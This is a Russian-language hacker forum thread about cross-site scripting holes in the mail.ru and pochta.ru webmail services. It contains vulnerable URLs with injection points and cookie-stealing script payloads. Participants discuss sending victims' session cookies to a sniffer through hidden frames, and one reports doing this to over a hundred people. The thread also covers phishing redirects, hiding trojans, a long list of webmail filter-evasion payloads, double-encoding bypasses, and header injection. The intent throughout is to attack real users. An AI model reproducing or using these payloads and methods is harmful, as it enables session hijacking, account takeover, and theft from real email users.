это на мэйл.ру
http://win.mail.ru/cgi-bin/rpopedit?Action=1&POPServer=ХСС_КОД_ЗДЕСЬ&POPUsername=null&POPPassword=null &WaitTime=1&KeepTime=2&NoFilter=&Folder=950
а это на почта.ру
http://www.pochta.ru/forgot.php?login=ХСС_КОД_1&domain=ХСС_КОД_2
как видите на почта ру есть сразу 2 хсс =)
источник ww.web-hack.ru

Что эта ХСС дает и как ей пользоваться?
ХСС_КОД_ЗДЕСЬ -сюда примерно что вписывать?

ну млин XSS не знаешь че такое....примерно впиши <script>alert();</script> и увидишь....можно перехватить сессию но я не знаю как и в описании баги тож не дается

http://www.pochta.ru/forgot.php?login=short&domain=front.ru
- это форма смены пароля!
И помойму она не чего не дает.?

но в описании баги автор сказал что через нее можно перехватить сессии но я не понял как...если хочешь оригинал почитать то зайди на ВебХак

да таких уязвимостей дофига и больше. Мы называем их пассивный Xss, потому что для проведения атаки надо заставить пользователя выполнить запрос

а как можно чужуюю сессию перехватить?
типа оффтоп: Джазз а зачем у тебя под ником не Moderator а Morderator написано?)))))

можно, но таким методом делать - геморой себе наживать.
Легче и надежнее просто отослать письмо с картинкой или фреймом с урл сниффера, и сессия будет перехвачена. только ты ей не воспользуешься чтобы зайти в ящик, потому что на почте.ру идет проверка по айпи. Надо чтобы действия исходили из браузера жертвы.. Ну как обычно вобщим.
про оффтоп: спасибо что сообщил, исправим. Шутка))))

=)) короче опасность: минимальная ))) да и вобще самая неопасная дыра это ХСС )

про про оффтоп: =))) надеюся что админы увидели мое сообщение ))

Нефига писать то что написано на webhack

а причем тут вебхак я просто источник указал,а что не надо было? да ты же знаешь что нас сама бага интересует

ну вот эта http://win.mail.ru/cgi-bin/rpopedit?Action=1&POPServer=ХСС_КОД_ЗДЕСЬ&POPUsername=null&POPPassword=null &WaitTime=1&KeepTime=2&NoFilter=&Folder=950
не функционирует

а вот с другими похожими багами у меня проблема -
если ХСС будет посылать куку на снифер то если сходить по такой ссылке то кука нормально уходит на снифер, а вот если вставить такой адрес в невидимый фраме или ифраме то на снифер уходит только часть куки - я бы сказал часть всегда разная но никогда не целая. я проверил на >100 лохов и всегда получаеться только так - кука с открытого окна приходит целая а из фраме приходит только часть

вопрос как сделать правильно чтоб кука приходила целая из фраме?

а ты что вставлял?

http://astral.mail.ru/natal.php?day=444&month=444&year=444&hour=444&minut=<script>alert(document.cookie)</script>&Submit=Go

это конечно все хорошо... но http://astral.mail.ru/ и http://mail.ru/ это разные домены... и украсть куки с домена http://mail.ru/ при помощи уязвимости XSS http://astral.mail.ru/ нельзя.

Зато можно редиректнуть пользователя на страницу похожую на мейл ру и там попросить его ввести пароль. Хотя это больше ИДИОТСКАЯ сой. инженерия, сгореть ей в аду

гоблен может это от того что src во фреймах в IE не могут содержать больше некоторого кол-ва символов?(дальше будут ошибки, вплоть до переполнения буфера)
(Хотя скорее всего здесь что-то другое)

это конечно все хорошо... но http://astral.mail.ru/ и http://mail.ru/ это разные домены... и украсть куки с домена http://mail.ru/ при помощи уязвимости XSS http://astral.mail.ru/ нельзя.
Егорыч, вот это согласись, ты написал - ЛОЛ!
Кстати, во-первых, баги, которые на веб-хаке опубликовали - это я нашел.(там директ на мой сайт есть), во-вторых, у меня есть еще около 5 свежих XSS багов там же! Далее, специально для Егорыча=))
Если у нас есть куки с www.mail.ru, а на astral.mail.ru есть XSS-баг, то куки с мейла БУДУТ выводится!!! Если не веришь, стукни мне в асю - 440043=)) Жду=)

Багу на http://astral.mail.ru/ вообще по моему www.asteam.org первые нашли.

antiox
продемонстрируйте нам раз такое дело...
А вобще лол не там где Егорыч написал, а в том, что вы суетитесь мол "это ниибаццо мы первые нашли, а не они и хз и тд и провавры"
<МАТ> нашли.


пожалуста, не пишите матом - это некрасиво

Надо багу use пока не прикрыта, а не суетиться и искать на кого запатентована бага :)

JazzzSummerMan
Без проблем продемонстрирую! Я сам удивился, когда увидел, что эти дибилы на мейле установили привязку куков к основному домену, т.е. на поддоменах они тоже работают! Я ж сказал, сточи в асю 440043 !! Безз проблем все покажу

вобще-то да. есть такое. Через чат потому что в ящики заходили, верно.
Но все же я продолжаю утверждать что такие xss , которые требуют принудительного выполнения в браузере жертвы не очень эффективны)).

гоблен может это от того что src во фреймах в IE не могут содержать больше некоторого кол-ва символов?(дальше будут ошибки, вплоть до переполнения буфера)
(Хотя скорее всего здесь что-то другое)

я вообще то раньше этим методом не интересовался но сейчас вижу что это очень продуктивный метод для некоторых применений

попробуй зайти в свой почтовый ящик на майл ру и в другом окне открыть чат. и попробуй открыть окно со с фраме котороя будет содержать тотже чат. я думаю что из фраме добраться можно только до кук которые были записаны в этот фраме а к кукам что уже есть на компе фраме не имеет доступа.

Но все же я продолжаю утверждать что такие xss , которые требуют принудительного выполнения в браузере жертвы не очень эффективны
Почему? Это один из способов.

p.s. Форум IdealBB в куках хранит не зашифрованный пароль. =)

Гоблен не совсем понял что ты имел ввиду, но эта тема уже из разряда политики безопасности cookies вроде, тут есть как общепринятые правила, так и методы обхода защиты хм

Почему? Это один из способов.

p.s. Форум IdealBB в куках хранит не зашифрованный пароль. =)
Согласен что один из способов, но активный xss проще в использовании и легче ищется.
про IdealBB знамо дело, если комп запомнен, то пасс сохранен
http://antichat.ru/txt/idealbb/

Гоблен не совсем понял что ты имел ввиду, но эта тема уже из разряда политики безопасности cookies вроде, тут есть как общепринятые правила, так и методы обхода защиты хм

ты знаешь как обойти эту проблему? я применил два не очень красивых способа - открывать попуп с ххс или с левой страницы посылать на страницу с ххс который не только п**дит куки но и переадресовывает на беспонтовую другую страницу.

да и чисто поясню
письмами со скриптом можно на***вать только нестолкнувшихся с таким феноменом людей, а вот бывалые пострадавшие никогда неоткроют никакое письмо через веб- они сейчас все пользуються разной х**той типо оутлоок или бат или еще че нибудь.

Ты знаешь как обойти эту проблему? я применил два не очень красивых способа - открывать попуп с ххс или с левой страницы посылать на страницу с ххс который не только п**дит куки но и переадресовывает на беспонтовую другую страницу.

Это применили ешё до тебя 3 года назад.

оутлук\бат = трой -))
я щас сижу тока через веб, потому как сам начал занимаца троянами и знаю что можно сделать -)) даже не догадаешся то что его подцепил -))

Расскажи нам)

рассказать что?

Это применили ешё до тебя 3 года назад.

если ты знаешь какойнибудь способ который кто применил 3 года назад так ты его сюда выложи

оутлук\бат = трой -))
я щас сижу тока через веб, потому как сам начал занимаца троянами и знаю что можно сделать -)) даже не догадаешся то что его подцепил -))
имею ввиду расскажи незаметные способы протроянить через аутлук или бэт

читай внимательнее. троян.
если *.exe не палит антивирь, не факт то, что это не троян. Трояны могут быть в программе, которой ты сам разрешишь доступ в веб, например какой нить мэйл флудер или чат-крякер. спрятать его труда не состовляет.

а JaVaScRiPt убрали, вчера работало а сегодня нет уже.


JazzzSummerMan ты знаешь альтернативу?

читай внимательнее. троян.
если *.exe не палит антивирь, не факт то, что это не троян. Трояны могут быть в программе, которой ты сам разрешишь доступ в веб, например какой нить мэйл флудер или чат-крякер. спрятать его труда не состовляет.
я внимательно читаю
Какая разница палится или нет прога антивирусом, как они работают и тд. Это EXE. В новых версиях Бэт вообще нельзя её открыть из самого клиента без предварительного сохранения на диске. И где здесь то что ты назвал "подцепить троян и не заметить"?
Думал что у тебя есть способы обхода ограничений в потовых клиентах.

Гоблен вот тебе программа от LittleLamer для тестирования почты на XSS, скачай её, сразу разберешься что к чему, и мне кажется что ты сразу найдешь кучу альтернатив

http://forum.antichat.ru/attachment.php?attachmentid=71

ну ты сам хоть знаешь альтернативу?
а little lamer молодец набрал много вариантов тока зачем там програмка если и так все это можно послать?

и вот что получается:

<font face="Verdana" size=3 color=maroon>XSS</font><font face="Verdana" size=2 color=green> security tester v1.1</font><br>
<xscript><!-- alert(1) --></xscript>
<xscript src=http://xsstest.narod.ru/2.js><!-- --></xscript>
<xbody filtered-onLoad=alert(2)>
<xbody filtered-onlOaD=alert(3)>

<image src=http://xsstest.narod.ru/1.jpg filtered-onload=alert(5)>
<image src=http://xsstest.narod.ru/1.jpg filtered-onlOaD=alert(6)>
<image src=xjavascript:alert(7)>
<image src="" filtered-onerror=alert(8)>
<image src='' filtered-onerror=alert(9)>
<img src="" filtered-onerror=alert(10)>
<img src='' filtered-onerror=alert(11)>
<xembed src=xjavascript:alert(12);this.avi>
<xembed src=xjavascript:alert(13);this.wav>
<img src=http://jstest.narod.ru/1.jpg filtered-onload=alert(14)>
<img src=http://jstest.narod.ru/1.jpg filtered-onlOaD=alert(15)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(17))>
<span xstyle=background:url(xjavascript:alert(18))></span>
<hr xstyle=top:expression(alert(19))>
<span xstyle=top:expression(alert(20))></span>
<span sss="alert(21);this.sss=null" xstyle=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' xstyle=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null xstyle=top:expression(eval(this.sss));></span>
<hr sss="alert(24);this.sss=null" xstyle=top:expression(eval(this.sss));>
<hr sss='alert(25);this.sss=null' xstyle=top:expression(eval(this.sss));>
<hr sss=alert(26);this.sss=null xstyle=top:expression(eval(this.sss));>
<xstyle type="text/css"><!-- @import url(javascript:alert(27)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(28)></xobject>
<xiframe src=xjavascript:alert(29)>
<a href=xjavascript:alert(30) target="_blank">click me</a>

<image src=xvbscript:alert(32)>
<xembed src=xvbscript:alert(33);this.avi>
<xembed src=xvbscript:alert(34);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xvbscript:alert(36))>
<span xstyle=background:url(xvbscript:alert(37))></span>
<xstyle type="text/css"><!-- @import url(vbscript:alert(38)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xvbscript:alert(39)></xobject>
<xiframe src=xvbscript:alert(40)>
<a href=xvbscript:alert(41) target="_blank">click me</a>

<image src=xjavascript:alert(43)>
<xembed src=xjavascript:alert(44);this.avi>
<xembed src=xjavascript:alert(45);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(47))>
<span xstyle=background:url(xjavascript:alert(48))></span>
<xstyle type="text/css"><!-- @import url(javascript:alert(49)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(50)></xobject>
<xiframe src=xjavascript:alert(51)>
<a href=xjavascript:alert(52) target="_blank">click me</a>

<image src=xjavascript:alert(54)>
<xembed src=xjavascript:alert(55);this.avi>
<xembed src=xjavascript:alert(56);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(58))>
<span xstyle=background:url(xjavascript:alert(59))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(60)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(61)></xobject>
<xiframe src=xjavascript:alert(62)>
<a href=xjavascript:alert(63) target="_blank">click me</a>

<image src=xjavascript:alert(65)>
<xembed src=xjavascript:alert(66);this.avi>
<xembed src=xjavascript:alert(67);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(69))>
<span xstyle=background:url(xjavascript:alert(70))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(71)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(72)></xobject>
<xiframe src=xjavascript:alert(73)>
<a href=xjavascript:alert(74) target="_blank">click me</a>

<image src=xjavascript:alert(76)>
<xembed src=xjavascript:alert(77);this.avi>
<xembed src=xjavascript:alert(78);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(80))>
<span xstyle=background:url(xjavascript:alert(81))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(82)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(83)></xobject>
<xiframe src=xjavascript:alert(84)>
<a href=xjavascript:alert(85) target="_blank">click me</a>

<image src=xjavascript:alert(87)>
<xembed src=xjavascript:alert(88);this.avi>
<xembed src=xjavascript:alert(89);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(91))>
<span xstyle=background:url(xjavascript:alert(92))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(93)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(94)></xobject>
<xiframe src=xjavascript:alert(95)>
<a href=xjavascript:alert(96) target="_blank">click me</a>



<image src=xjavascript:alert(98)>

<xembed src=xjavascript:alert(99);this.avi>

<xembed src=xjavascript:alert(100);this.wav>

<img src="http://img.mail.ru/mail/ru/images/dumb.gif">

<hr xstyle=background:url(xjavascript:alert(102))>

<span xstyle=background:url(xjavascript:alert(103))></span>
<xstyle type="text/css"><!-- @import url(javascript
:alert(104)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=xjavascript:alert(105)></xobject>


<xiframe src=javascript <a href=xjavascript:alert(106)>click me</a>
<image src="" filtered-onERror=alert(107)>
<image src='' filtered-onERror=alert(108)>
<img src="" filtered-onERror=alert(109)>
<img src='' filtered-onERror=alert(110)>
<image src=""filtered-onerror=alert(111)>
<image src=''filtered-onerror=alert(112)>
<img src=""filtered-onerror=alert(113)>
<img src=''filtered-onerror=alert(114)>
<image src=""filtered-onErRor=alert(115)>
<image src=''filtered-onErRor=alert(116)>
<img src=""filtered-onErRor=alert(117)>
<img src=''filtered-onErRor=alert(118)>
<image src="a"filtered-onError=alert(119)>
<image src='a'filtered-onError=alert(120)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(121)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(122)>
<image src="a"filtered-onErRor=alert(123)>
<image src='a'filtered-onERror=alert(124)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(125)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(126)>
<image src="a" filtered-onErRor=alert(127)>
<image src='a' filtered-onErRor=alert(128)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(129)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(130)>
<image src="a"filtered-onerror=alert(131)>
<image src='a'filtered-onerror=alert(132)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(133)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(134)>
<image src="a"filtered-onErRor=alert(135)>
<image src='a'filtered-onErRor=alert(136)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(137)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(138)>


так что эти приколы уже непойдут.

да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.

ну ты сам хоть знаешь альтернативу?
Не знаю, потому что не собирался искать без надобности

зачем там програмка если и так все это можно послать?
Можно и так посылать, но во-первых СМТП-шник готовый есть, который в хтмл шлет), а во-вторых процесс автоматизируется, для всяких почт можно сразу использовать. и со своими настройками.

так что эти приколы уже непойдут.
Ты же понимаешь принцип обхода фильтров. Так найди свои приколы, тема не новая, кто за тебя будет рутиной заниматься хм..


да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.

явоскриптом никак нельзя имхо , реф на уровне заголовков все-таки.
Тебе это нужно чтобы настроить пересылку в почте, верно? Есть кое-какие соображения. поделюсь позже, если получится

ну если не знаешь я тебя не прошу искать, я поковыряюсь сам. и про програмку я ничего плохого ни говорил ну бывает что человеку из 1000 почт надо найти уязвимую тогда на помощь приходит автоматика только зарегистрироваться везде надо в ручную.

У разработчиков новые методы защиты теперь, начитались форума на античате имхо)
LittleLamer просек одну фишку для яндекса http://www.forum.antichat.ru/showthread.php?t=6536. Она работает и на мэйл.ру
Если закодировать javascript в десятичный код, то потом просматривая HTML видно что почтовый фильтр конвертирует его обратно и "портит": xjavascript.
А если дважды зашифровать, то фильтр раскодирует один раз и оставит в виде который понятен браузеру

сичас попробую.

я вот думаю про реферер ты не пробовал как нибудь технично сделать запрос чтобы в одной строке было что то типо
http://hueta.ru/index.html%od%oaReferer: что то
в смысле чтоб загнать реферер в запрос а второй реферер что добавит ИЕ ничего не будет значить ибо былобы как и x-forwarded-for - ПХП просто находит первый а на второй ни обращает внимания. я сам ни пробовал и не знаю, но ты выскажи мнение.

не получится потому что там переменные среды окружения все-таки так называемые. Некоторые назвали бы твои слова ламерским бредом, но все же при стечении некоторых обстоятельств имхо такое возможно

это был вопрос. и он был про ту же тему как и %0d%0a инекции. тогда я сам попробую. а до того как какой нибудь лох меня назовет мне дела нету ибо мне в прикол ламерить. с майл ру спасибо за конкретный совет все работает только не думаю что это надолго.

PinkPanther спасибо за корекции - самому теперь в прикол читать.

Забавно но нечего это не дает .

http://uid111.narod.ru/pochta.gif

сичас попробую.

я вот думаю про реферер ты не пробовал как нибудь технично сделать запрос чтобы в одной строке было что то типо
http://hueta.ru/index.html%od%oaReferer: что то
в смысле чтоб загнать реферер в запрос а второй реферер что добавит ИЕ ничего не будет значить ибо былобы как и x-forwarded-for - ПХП просто находит первый а на второй ни обращает внимания. я сам ни пробовал и не знаю, но ты выскажи мнение.
Вполне реальная вещь. Давно уже известна под названием HTTP Response Splitting

Вполне реальная вещь. Давно уже известна под названием HTTP Response Splitting

я про то же.

да и я однажды создавал тут такую тему и спрашивал про
тот вид атак но увы никто не ответил)))потом сам прочитал...кстати интересная атака..нашел однажды уязвимый скрипт но ничего не смог сделать т.к. не знал как можно максимально использовать эту багу!